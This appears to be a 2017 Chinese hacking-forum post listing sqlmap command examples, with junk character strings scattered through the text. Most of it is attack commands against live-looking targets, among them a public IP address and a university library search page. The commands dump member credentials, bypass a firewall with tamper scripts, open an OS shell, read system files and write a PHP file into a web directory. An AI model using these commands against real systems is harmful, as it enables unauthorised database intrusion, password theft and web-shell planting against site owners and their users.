找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1906|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
# d7 F2 K) U( m0 a' G2 S$ ^2 d9 p2 ~% m" @% k1 K
update :::::>     in the folder   after  execute    following   order : svn update$ l- H7 s" @% u7 `; K
" o! C: A' v" G% a
sqlmap.py -r 1.txt --current-db
7 u1 G( b2 H/ }. ]4 Z
5 f+ }5 z5 w5 b4 ~/ V) Fv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”( ^1 s2 z/ l* D& U8 z2 s7 T- g

' n2 @# S5 [, V( Z7 V==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 3 a% S- _5 n& E
猜解数据库5 w. n$ j2 z4 }0 O- g$ y+ \
./sqlmap.py -u "injection-url" --dbs
- {% B+ v+ G( g* x5 {+ lsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"& L, e9 A/ s. U$ f
+ n$ g1 ^2 k6 K3 ~8 u+ c. q
猜解表名$ E" V- I2 g6 r1 O+ F" h
./sqlmap.py -u "injection-url" -D database_name --tables0 w. f( j$ c0 Q' \8 t6 D$ N

, R* u4 i* k& i/ H, C- _sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
  ]) A2 T' l4 B: x' l/ b1 M- ?3 Zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
" H5 f' S* T1 J+ f$ |$ _" t
" s( m" `' O' lsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
3 ~1 l  G( r9 [* d, e* G# D8 q. q/ b* W
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
8 [; }# ?' R) C  n5 j; rsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"# O9 Y3 y' }  P/ J/ @( u) [/ D
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# m8 e  ]3 u3 X5 G: e. T$ Fsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
4 {7 k: o$ f; m# v! I- d; g
' W5 x+ L/ h+ M9 r% U: Msqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"' F; @( o" j; V
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
0 z2 R2 f! c9 |$ n# e  h- Gsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
% z8 `, i8 d; p" F; [sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
- D% q: n; Q4 Fsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
) c) ]- E0 @0 L9 p$ _, b( _5 s$ {+ W5 A) j# u  w5 k- ^
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了; X9 X8 a! O$ J( K- r% W
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"3 e/ Z/ \' d0 }

, F' P! s8 N3 S% W% e- `sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"$ L+ a- H: `$ w! n' c$ Y, k* i; K
猜解列名5 i% w6 p" N' ~: i, I9 f1 W
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
3 n7 ^  z0 G) U# s7 m$ }7 v$ _2 A# T& b7 D
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
' G6 X7 U- w1 o) I. ]" asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ; ?6 E& U( H) D; [3 N
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
0 r4 e5 y4 t9 E1 [/ e) w6 Z6 P+ R( i* ?3 Q8 w% @
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"; K' S/ V: c1 J" t
&submit=Go
2 m9 J! Q$ r4 G. F* ]' W/ z猜解值
$ d6 h9 \( y4 @) R./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
  Q7 P1 h- x+ H4 F, N" ?6 H========================================================
+ ?4 N5 [4 R! e搜索表名中包括mana字符的
7 f( K* w- c" Z* D/sqlmap.py -u "injection-url" -T mana --search: _& g7 o1 {( m7 Y% P: o7 S; i
返回一个交互式sql shell3 j. j8 b/ ^! I9 ^; z& X
/sqlmap.py -u "injection-url" --sql-shell
5 f) [9 f* i  u, R+ Q读取指定文件(需权限)
+ s1 H# S) H. f  R& o& C* s/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
, N' A9 v/ k  u) ^% a. Z查看当前 用户 及 数据库 ! A4 H/ O$ V  i/ J4 ^, W
/sqlmap.py -u "injection-url" --current-user --current-db& a: `: F0 D" f6 v+ @
本地文件 写入 远程目标绝对路径
( s$ |: T9 @7 w  f# y/ r/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
8 `. ~4 ^0 ^- I3 b) esqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
; P; L" ?* T' g- p/ T
  ~; g" A' a" v6 \# hsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径/ l$ y$ i% G, K3 l$ ?5 j8 q
查看某用的权限0 g7 ~8 w$ a1 `4 i3 b. _
/sqlmap.py -u "injection-url" --privileges -U root
: {/ h6 q/ b% P% ]查看当前用户是否为dba0 r1 t# R7 u0 E: K! ^
/sqlmap.py -u "injection-url" --is-dba6 p4 b9 v' i& V
读取所有数据库用户或指定数据库用户的密码
, b" z, P! [* m  Zsqlmap.py -r 1.txt --users --passwords
/ R. m! W! i3 r7 t+ v% N1 O  `& ysqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" / ^  C/ \" R: n; H9 e0 _* C
+ X* P( A- j( m5 C# _
/sqlmap.py -u "injection-url" --passwords -U root
8 o5 [3 g9 ]2 V3 i5 ~' ^# M# x" S* h/ {5 C7 q+ d
--start&&--stop 与 --first&&--last 的区别0 s* P  ~0 ]% c6 D/ ~7 L$ F
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
) s  ^3 m  j6 L; i- f: a5 W
$ ^; g& H! a0 F$ }! L从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
5 _9 f% L5 l4 x6 O' K* y; W/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables$ _& G5 q( t& ]; n+ _
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
9 f! l+ l# E. L# e8 X! a7 b2 K
! C5 J; o6 X$ H2 l. I: N9 E执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)1 ^3 m' \* K: D* s, g
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip") U! N# }" D7 E* ?* o
% |4 u' p3 X+ ~# F+ r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表